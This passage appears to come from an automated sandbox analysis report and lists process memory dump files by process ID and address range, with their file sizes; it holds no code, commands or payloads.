                        3.0MB

                      • memory/4288-454-0x0000000001000000-0x000000000130A000-memory.dmp

                        Filesize

                        3.0MB

                      • memory/4324-314-0x0000000000FC0000-0x0000000001482000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/4324-315-0x0000000000FC0000-0x0000000001482000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/4904-288-0x00000000004E0000-0x0000000000ECD000-memory.dmp

                        Filesize

                        9.9MB

                      • memory/4904-325-0x00000000004E0000-0x0000000000ECD000-memory.dmp

                        Filesize

                        9.9MB

                      • memory/4904-313-0x00000000004E0000-0x0000000000ECD000-memory.dmp

                        Filesize

                        9.9MB

                      • memory/4904-316-0x00000000004E0000-0x0000000000ECD000-memory.dmp

                        Filesize

                        9.9MB

                      • memory/4960-164-0x0000000006220000-0x000000000626C000-memory.dmp

                        Filesize

                        304KB

                      • memory/4960-162-0x0000000005B30000-0x0000000005E84000-memory.dmp

                        Filesize

                        3.3MB

                      • memory/5008-392-0x0000000000A90000-0x0000000000F25000-memory.dmp

                        Filesize

                        4.6MB

                      • memory/5008-438-0x0000000000A90000-0x0000000000F25000-memory.dmp

                        Filesize

                        4.6MB

                      • memory/5848-786-0x0000000000E10000-0x000000000125E000-memory.dmp

                        Filesize

                        4.3MB

                      • memory/5848-783-0x0000000000E10000-0x000000000125E000-memory.dmp

                        Filesize

                        4.3MB

                      • memory/5848-777-0x0000000000E10000-0x000000000125E000-memory.dmp

                        Filesize

                        4.3MB

                      • memory/5848-943-0x0000000000E10000-0x000000000125E000-memory.dmp

                        Filesize

                        4.3MB

                      • memory/5848-953-0x0000000000E10000-0x000000000125E000-memory.dmp

                        Filesize

                        4.3MB